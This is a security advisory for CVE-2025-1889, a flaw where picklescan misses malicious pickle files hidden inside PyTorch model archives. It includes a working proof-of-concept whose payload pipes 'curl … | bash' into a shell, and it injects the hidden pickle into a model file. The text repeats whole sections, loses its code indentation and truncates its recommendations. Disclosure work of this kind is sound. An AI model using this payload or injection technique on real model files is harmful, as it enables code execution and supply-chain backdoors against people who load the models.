Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.
Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.
import os
import pickle
import torch
import zipfile
from functools import partial
class RemoteCodeExecution:
def __reduce__(self):
return os.system, ("curl -s http://localhost:8080 | bash",)
# Create a directory inside the model
os.makedirs("model", exist_ok=True)
# Create a hidden malicious pickle file
with open("model/config.p", "wb") as f:
pickle.dump(RemoteCodeExecution(), f)
# Create a benign model
model = {}
class AutoLoad:
def __init__(self, path, **kwargs):
self.path = path
self.kwargs = kwargs
def __reduce__(self):
# Use functools.partial to create a partially applied function
# with torch.load and the pickle_file argument
return partial(torch.load, self.path, **self.kwargs), ()
model['config'] = AutoLoad(model_name, pickle_file='config.p', weights_only=False)
torch.save(model, "model.pt")
# Inject the second pickle into the model archive
with zipfile.ZipFile("model.pt", "a") as archive:
archive.write("model/config.p", "model/config.p")
# Loading the model triggers execution of config.p
torch.load("model.pt")
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.
Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.
CVE-2025-1889
Summary
Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.
Details
Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.
A typical attack works as follows:
PoC
Impact
Severity: High
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.
Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.
Recommendations
- torch.load
- Block functools.partial